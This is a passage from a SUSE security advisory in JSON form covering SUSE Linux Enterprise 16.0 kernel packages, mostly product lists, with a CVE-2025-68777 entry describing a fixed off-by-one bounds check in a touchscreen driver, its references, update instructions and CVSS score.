"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68776"
},
{
"cve": "CVE-2025-68777",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68777"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: ti_am335x_tsc - fix off-by-one error in wire_order validation\n\nThe current validation \u0027wire_order[i] \u003e ARRAY_SIZE(config_pins)\u0027 allows\nwire_order[i] to equal ARRAY_SIZE(config_pins), which causes out-of-bounds\naccess when used as index in \u0027config_pins[wire_order[i]]\u0027.\n\nSince config_pins has 4 elements (indices 0-3), the valid range for\nwire_order should be 0-3. Fix the off-by-one error by using \u003e= instead\nof \u003e in the validation check.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68777",
"url": "https://www.suse.com/security/cve/CVE-2025-68777"
},
{
"category": "external",
"summary": "SUSE Bug 1256655 for CVE-2025-68777",
"url": "https://bugzilla.suse.com/1256655"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
